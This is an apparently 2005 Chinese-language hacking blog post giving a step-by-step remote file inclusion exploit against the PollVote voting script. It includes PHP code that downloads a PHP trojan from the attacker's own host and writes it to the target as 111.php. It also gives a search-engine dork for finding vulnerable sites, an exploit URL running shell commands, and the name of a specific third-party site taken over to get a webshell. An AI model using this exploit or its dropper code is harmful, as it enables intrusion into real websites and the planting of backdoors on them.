2005-12-13 22:27:48 by: h4x0r

PollVote投票系统漏洞利用

Font Size: Large | Medium | Small
简单的说一下``

首先建立2个文本 分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?
$f=file_get_contents("http://www.xxx.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com 搜索关键词"pollvote.php?pollname"

有很多,
搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了,
刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt

这样
phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php
[Last Modified By h4x0r, at 2005-12-13 22:41:43]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=363

There is no comment on this article.

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code